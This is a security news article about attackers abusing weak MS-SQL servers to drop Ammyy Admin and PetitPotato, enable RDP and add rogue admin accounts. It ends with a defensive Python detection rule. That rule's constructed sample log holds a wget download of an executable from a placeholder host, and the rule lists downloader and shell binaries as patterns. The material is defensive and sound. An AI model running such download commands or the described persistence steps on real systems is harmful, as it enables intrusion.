27th April 2025, Kathmandu
In a newly uncovered cyberattack campaign, hackers are targeting poorly managed Microsoft SQL (MS-SQL) servers to deploy Ammyy Admin and PetitPotato malware, posing a serious threat to organizations worldwide.
MS-SQL Server Vulnerabilities Exploited
Cybersecurity researchers have revealed that attackers are exploiting server vulnerabilities to gain unauthorized access, perform reconnaissance, and establish remote control over compromised systems.
New Threat Campaign Targets Vulnerable MS-SQL Servers
The campaign begins with attackers scanning for misconfigured or unpatched MS-SQL servers, taking advantage of weak credentials and known vulnerabilities. Once inside the system, they execute commands to gather critical system information, mapping out the infrastructure for further exploitation.
Using tools like Wget, attackers download and install malicious payloads, notably:
- Ammyy Admin: A legitimate remote desktop software often abused by hackers for remote access.
- PetitPotato: A stealthy malware specializing in privilege escalation, allowing attackers to gain elevated access within the system.
These malware installations enable persistent control over the server, setting the stage for deeper penetration into an organization’s network.
Maintaining Persistent Access Through RDP and Rogue Accounts
Beyond initial access, attackers are taking additional steps to secure long-term control over compromised environments. Key strategies include:
- Enabling Remote Desktop Protocol (RDP), even where it was previously disabled, to create a backdoor.
- Creating new administrative accounts with elevated privileges to remain undetected.
This multi-layered attack strategy ensures that even if organizations detect and close initial vulnerabilities, the attackers maintain alternative access points for future malicious activities, such as data theft, ransomware deployment, or network disruption.
Symantec’s Response and Protection Measures
Symantec has swiftly responded by offering protections across multiple layers:
- File-based detections: Hacktool.Gen, Hacktool.Porttran, Trojan.Gen.MBT and WS.Malware.1.
- Machine-learning-based detections: Heur.AdvML.A!300, Heur.AdvML.B, Heur.AdvML.B!200, and others.
- Web-based protections: Blocking malicious domains and IP addresses using WebPulse-enabled categories.
- Endpoint protection: VMware Carbon Black Cloud blocks known and suspect programs through strict policy enforcement.
Symantec recommends enforcing strict execution blocking, enabling cloud scan delays, and combining reputation-based protection with real-time threat intelligence for optimal security.
How Can Organizations Protect Against These Attacks?
This emerging threat is a wake-up call for businesses relying on database servers like MS-SQL. To mitigate risks, organizations must:
- Regularly patch and update all servers and applications.
- Enforce strong, multi-factor authentication on all remote and administrative access points.
- Disable unnecessary services such as RDP unless needed.
- Monitor account creation and look for suspicious administrative behavior.
- Adopt a multi-layered security approach that includes endpoint detection, behavioral analytics, and continuous network monitoring.
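The monitoring advice above can be turned into a simple correlation rule that looks for the stages of this campaign together on one host: a shell or downloader spawned by the SQL Server process, a newly created account, that account being added to Administrators, and RDP being switched on. The following is an added example, not code from the article or from Symantec; the event format and the sample log lines are constructed for illustration, loosely modelled on Windows Security and Sysmon fields, and the hostnames and URL are placeholders.

```python
import shlex
from collections import defaultdict

# Constructed sample telemetry (not taken from the article): one event per
# line as field=value pairs, loosely modelled on Windows Security/Sysmon data.
SAMPLE_LOG = """\
host=db01 type=process parent=sqlservr.exe image=cmd.exe cmdline="cmd.exe /c wget http://placeholder.invalid/aa.exe"
host=db01 type=account_created user=backupsvc
host=db01 type=group_member_added group=Administrators user=backupsvc
host=db01 type=registry value=fDenyTSConnections data=0
host=db02 type=process parent=sqlservr.exe image=sqlceip.exe cmdline="sqlceip.exe -Service"
host=web01 type=account_created user=alice
"""

# Binaries a database engine has no business launching as children.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wget.exe", "certutil.exe", "bitsadmin.exe"}

def parse_event(line):
    """Turn 'k=v k="v with spaces"' into a dict (shlex handles the quoting)."""
    return dict(tok.split("=", 1) for tok in shlex.split(line))

def classify(ev):
    """Map one event to a stage of the campaign described above, or None."""
    t = ev.get("type")
    if t == "process" and ev.get("parent", "").lower() == "sqlservr.exe":
        if ev.get("image", "").lower() in SUSPICIOUS_CHILDREN or "wget" in ev.get("cmdline", "").lower():
            return "sql_spawned_shell"      # command execution through MS-SQL
    if t == "account_created":
        return "new_account"                # rogue account staged
    if t == "group_member_added" and ev.get("group") == "Administrators":
        return "admin_added"                # account given elevated privileges
    if t == "registry" and ev.get("value") == "fDenyTSConnections" and ev.get("data") == "0":
        return "rdp_enabled"                # RDP turned on (fDenyTSConnections=0)
    return None

def analyze(log_text):
    """Return {host: sorted list of distinct stages seen on that host}."""
    findings = defaultdict(set)
    for line in filter(str.strip, log_text.splitlines()):
        ev = parse_event(line)
        cat = classify(ev)
        if cat:
            findings[ev["host"]].add(cat)
    return {h: sorted(c) for h, c in findings.items()}

def flagged_hosts(log_text, min_categories=2):
    """Hosts showing two or more stages of the chain; a lone new account is only noise."""
    return sorted(h for h, c in analyze(log_text).items() if len(c) >= min_categories)
```

Running `flagged_hosts(SAMPLE_LOG)` on the constructed sample flags only `db01`, where all four stages coincide, while the benign SQL child process on `db02` and the routine account creation on `web01` are not reported.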
In an era where cybercriminals are constantly refining their tactics, proactive defense, continuous vigilance, and a robust security posture are critical to safeguarding sensitive infrastructure.
For more: MS-SQL Server Vulnerabilities Exploited